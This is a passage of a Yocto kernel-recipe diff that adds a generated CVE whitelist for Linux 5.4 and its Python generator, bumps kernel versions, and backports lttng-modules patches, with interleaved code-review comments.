+CVE_CHECK_WHITELIST += "CVE-2024-26764"
+
+# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26766"
+
+# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26772"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26773"
+
+# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26777"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26778"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26779"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26780"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26781"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26782"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26783"
+
+# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26785"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26786"
+
+# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26788"
+
+# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26790"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26791"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26792"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26793"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26794"
+
+# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26796"
+
+# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26799"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26800"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26801"
+
+# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26804"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26805"
+
+# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26807"
+
+# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
+
diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python3
+
+# Generate granular CVE status metadata for a specific version of the kernel
+# using data from linuxkernelcves.com.
+#
+# SPDX-License-Identifier: GPL-2.0-only
+
+import argparse
+import datetime
+import json
+import pathlib
+import re
+
+from packaging.version import Version
+
+
+def parse_version(s):
+ """
+ Parse the version string and either return a packaging.version.Version, or
+ None if the string was unset or "unk".
+ """
+ if s and s != "unk":
+ # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
+ s = s.replace("-dontuse", "")
+ return Version(s)
+ return None
+
+
+def main(argp=None):
+ parser = argparse.ArgumentParser()
+ parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
+ parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
+
+ args = parser.parse_args(argp)
+ datadir = args.datadir
+ version = args.version
+ base_version = f"{version.major}.{version.minor}"
+
+ with open(datadir / "data" / "kernel_cves.json", "r") as f:
+ cve_data = json.load(f)
+
+ with open(datadir / "data" / "stream_fixes.json", "r") as f:
+ stream_data = json.load(f)
+
+ print(f"""
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at {datetime.datetime.now()} for version {version}
+
+python check_kernel_cve_status_version() {{
+ this_version = "{version}"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+""")
+
+ for cve, data in cve_data.items():
+ if "affected_versions" not in data:
+ print(f"# Skipping {cve}, no affected_versions")
+ print()
+ continue
+
+ affected = data["affected_versions"]
+ first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
+ first_affected = parse_version(first_affected)
+ last_affected = parse_version(last_affected)
+
+ handled = False
+ if not last_affected:
+ print(f"# {cve} has no known resolution")
+ elif first_affected and version < first_affected:
+ print(f"# fixed-version: only affects {first_affected} onwards")
+ handled = True
+ elif last_affected < version:
+ print(f"# fixed-version: Fixed after version {last_affected}")
+ handled = True
+ else:
+ if cve in stream_data:
+ backport_data = stream_data[cve]
+ if base_version in backport_data:
+ backport_ver = Version(backport_data[base_version]["fixed_version"])
+ if backport_ver <= version:
+ print(f"# cpe-stable-backport: Backported in {backport_ver}")
+ handled = True
+ else:
+ # TODO print a note that the kernel needs bumping
+ print(f"# {cve} needs backporting (fixed from {backport_ver})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+
+ if handled:
+ print(f'CVE_CHECK_WHITELIST += "{cve}"')
+
+ print()
+
+
+if __name__ == "__main__":
+ main()
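Review bot: The `elif first_affected and version < first_affected:` branch whitelists a CVE purely because the target version sorts below the mainline release that introduced the bug, so if the introducing commit was itself backported to this stable series the script would, as far as the visible code shows, still emit `CVE_CHECK_WHITELIST` for it. `stream_data` is only consulted in the final `else`, and only for fixes. I would at least record the assumption above that branch: `# NOTE: compares against the mainline introduction version only; a backport of the introducing commit to this stable series is not detected`. Separately, `re.search(r"(.+) to (.+)", affected).groups()` raises AttributeError on an entry whose `affected_versions` string does not match; bind the match first and skip the entry with a `# Skipping {cve}` line, as the missing-key case already does.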
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 5940cc90ea..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -86,6 +86,12 @@ do_install() {
# be dealt with.
# cp -a scripts $kerneldir/build
+ # although module.lds can be regenerated on target via 'make modules_prepare'
+ # there are several places where 'makes scripts prepare' is done, and that won't
+ # regenerate the file. So we copy it onto the target as a migration to using
+ # modules_prepare
+ cp -a --parents scripts/module.lds $kerneldir/build/ 2>/dev/null || :
+
if [ -d arch/${ARCH}/scripts ]; then
cp -a arch/${ARCH}/scripts $kerneldir/build/arch/${ARCH}
fi
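Review bot: The added `cp -a --parents scripts/module.lds $kerneldir/build/ 2>/dev/null || :` discards every failure of the copy, not only the case where the file does not exist. A full disk or a permission problem would therefore leave the devsrc tree silently incomplete. Testing for the file first keeps real errors visible: `if [ -f scripts/module.lds ]; then cp -a --parents scripts/module.lds $kerneldir/build/; fi`. The next hunk of this file introduces the same pattern for `arch/arm/kernel/module.lds`. The new comment also reads `'makes scripts prepare'` where `'make scripts prepare'` is meant; do_install starts and ends outside the hunk.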
@@ -171,7 +177,7 @@ do_install() {
cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
fi
- cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/
+ cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
fi
if [ -d arch/${ARCH}/include ]; then
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 62cf6f5ea6..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -5,10 +5,12 @@ where you wish to build the kernel externally from the build system."
SECTION = "kernel"
LICENSE = "GPLv2"
-LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
+LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
PROVIDES += "virtual/kernel"
+inherit deploy linux-dummy
+
PACKAGES_DYNAMIC += "^kernel-module-.*"
PACKAGES_DYNAMIC += "^kernel-image-.*"
PACKAGES_DYNAMIC += "^kernel-firmware-.*"
@@ -24,7 +26,7 @@ DESCRIPTION_kernel-vmlinux = "Kernel vmlinux meta package"
INHIBIT_DEFAULT_DEPS = "1"
-#COMPATIBLE_MACHINE = "your_machine"
+COMPATIBLE_HOST = ".*-linux"
PR = "r1"
diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
inherit kernel
require recipes-kernel/linux/linux-yocto.inc
-# for ncurses tests
-inherit pkgconfig
# provide this .inc to set specific revisions
include recipes-kernel/linux/linux-yocto-dev-revisions.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index 524e91ebfc..f912304858 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
}
-SRCREV_machine ?= "3a5f7e9a874f0a6e9ad599b4fc6c491db231dd6f"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index 00e1b65782..2f94782471 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
require recipes-kernel/linux/linux-yocto.inc
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
KMETA = "kernel-meta"
KCONF_BSP_AUDIT_LEVEL = "2"
-SRCREV_machine_qemuarm ?= "58f39df46d9daf12a095ffe225032ec325612960"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
+SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
PV = "${LINUX_VERSION}+git${SRCPV}"
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
SUMMARY = "Linux kernel"
SECTION = "kernel"
LICENSE = "GPLv2"
+HOMEPAGE = "https://www.yoctoproject.org/"
LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
@@ -55,3 +56,6 @@ do_install_append(){
# enable kernel-sample for oeqa/runtime/cases's ksample.py test
KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
+
+# CVE exclusion
+include recipes-kernel/linux/cve-exclusion.inc
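Review bot: The `# CVE exclusion` comment does not tell a maintainer that this list applies to every recipe that requires linux-yocto.inc, whatever its LINUX_VERSION; in this diff that covers linux-yocto-dev.bb as well as the 5.4 recipes. An entry that holds for only one kernel series would hide that CVE from the report for all the others. The contents of cve-exclusion.inc are not visible here, so this is a documentation request rather than a confirmed defect. I would extend the comment to something like `# Version-independent CVE exclusions only; per-series lists belong in cve-exclusion_<series>.inc`. Note also that `include` is silent when the file is missing, where `require` would fail the parse.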
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 2a2ba24cd2..108043bd98 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
KBRANCH ?= "v5.4/standard/base"
require recipes-kernel/linux/linux-yocto.inc
+include recipes-kernel/linux/cve-exclusion_5.4.inc
# board specific branches
KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs"
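Review bot: Only linux-yocto_5.4.bb gains `include recipes-kernel/linux/cve-exclusion_5.4.inc`, although linux-yocto-rt_5.4.bb and linux-yocto-tiny_5.4.bb are moved to the same 5.4.273 in this diff. As far as the visible hunks show, those two recipes never pick up the generated list, so their CVE reports will differ from the standard kernel's. If that is intended, a short comment next to the include would say so; otherwise the same line belongs in both recipes. The generated file is tied to one kernel version and, per the generator earlier in this diff, a mismatch with LINUX_VERSION is reported only through `bb.warn`. A stale list therefore keeps suppressing entries after a bump unless someone regenerates it, which is worth stating here, e.g. `# regenerate cve-exclusion_5.4.inc whenever LINUX_VERSION changes`.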
@@ -12,16 +13,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base"
KBRANCH_qemux86-64 ?= "v5.4/standard/base"
KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
-SRCREV_machine_qemuarm ?= "561d4f6eb1de32e1448451db86656826cf406eb5"
-SRCREV_machine_qemuarm64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips ?= "e421f3f2399c153c4d58241cb6d1be926f7efc45"
-SRCREV_machine_qemuppc ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemuriscv64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86-64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips64 ?= "72d2f11b5f171e196d6b9824b82575d9a7b59e6f"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
+SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
+SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
+SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
+SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
+SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
# remap qemuarm to qemuarma15 for the 5.4 kernel
# KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
DEPENDS += "openssl-native util-linux-native"
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
new file mode 100644
index 0000000000..3fc7fd733d
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
+From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Mon, 4 Apr 2022 14:33:42 -0400
+Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
+
+See upstream commit :
+
+ commit 14c174633f349cb41ea90c2c0aaddac157012f74
+ Author: Jason A. Donenfeld <Jason@zx2c4.com>
+ Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
+Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 3ae2d39e..58da82b8 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
+ endif
+
++# Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ $(VERSION) -ge 4 \
++ if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ -a \
++ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
new file mode 100644
index 0000000000..5c324a9bde
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
+From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
+From: He Zhe <zhe.he@windriver.com>
+Date: Thu, 2 Jun 2022 06:36:08 +0000
+Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
+
+The following kernel commit has been back ported to v5.10.119 and v5.15.44.
+
+commit 14c174633f349cb41ea90c2c0aaddac157012f74
+Author: Jason A. Donenfeld <Jason@zx2c4.com>
+Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 58da82b8..87f2d681 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -217,7 +217,10 @@ endif
+
+ # Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ if [ \( ! \( $(VERSION) -ge 6 \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+ -a \
+ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+--
+2.35.1
+
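Review bot: In the added line `-o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \` there is no space before the first `\)`, so the shell passes `119)` to `[` as one word. The comparison then has a non-numeric operand and one group is left unclosed, so the test most likely errors out and lttng-probe-random.o is not selected for any kernel. Going by the SRC_URI order in lttng-modules_2.11.9.bb, patch 0019 is applied next and removes this whole block, so the net effect should be nil. Because this is a verbatim backport, I would leave the code alone and add a header line such as `Note: carried unchanged so that 0019 applies cleanly; the version test here is replaced by 0019.`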
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
new file mode 100644
index 0000000000..73ba4d06bc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
+From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Tue, 31 May 2022 15:24:48 -0400
+Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
+
+The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
+the 'random' tracepoints is being backported to multiple stable kernel
+branches, I don't see how that qualifies as a fix but here we are.
+
+Use the presence of 'include/trace/events/random.h' in the kernel source
+tree instead of the rather tortuous version check to determine if we
+need to build 'lttng-probe-random.ko'.
+
+Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
+Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 16 ++++------------
+ 1 file changed, 4 insertions(+), 12 deletions(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 87f2d681..f09d6b65 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ endif
+
+ # Introduced in v3.6, remove in v5.18
+-obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+- -a \
+- $(VERSION) -ge 4 \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
+- echo "lttng-probe-random.o" ; fi;)
++random_dep = $(srctree)/include/trace/events/random.h
++ifneq ($(wildcard $(random_dep)),)
++ obj-$(CONFIG_LTTNG) += lttng-probe-random.o
++endif
+
+ obj-$(CONFIG_LTTNG) += $(shell \
+ if [ $(VERSION) -ge 4 \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
+fix: jbd2: use the correct print format
+See upstream commit :
+
+ commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
+ Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
+ Date: Tue Oct 11 19:33:44 2022 +0800
+
+ jbd2: use the correct print format
+
+ The print format error was found when using ftrace event:
+ <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
+ <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
+
+ Use the correct print format for transaction, head and tid.
+
+Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+
+Upstream-status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Note: combines three upstream commits:
+https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
+https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
+https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
+
+diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
+--- a/instrumentation/events/lttng-module/jbd2.h
++++ b/instrumentation/events/lttng-module/jbd2.h
+@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
+ )
+ )
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
++
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
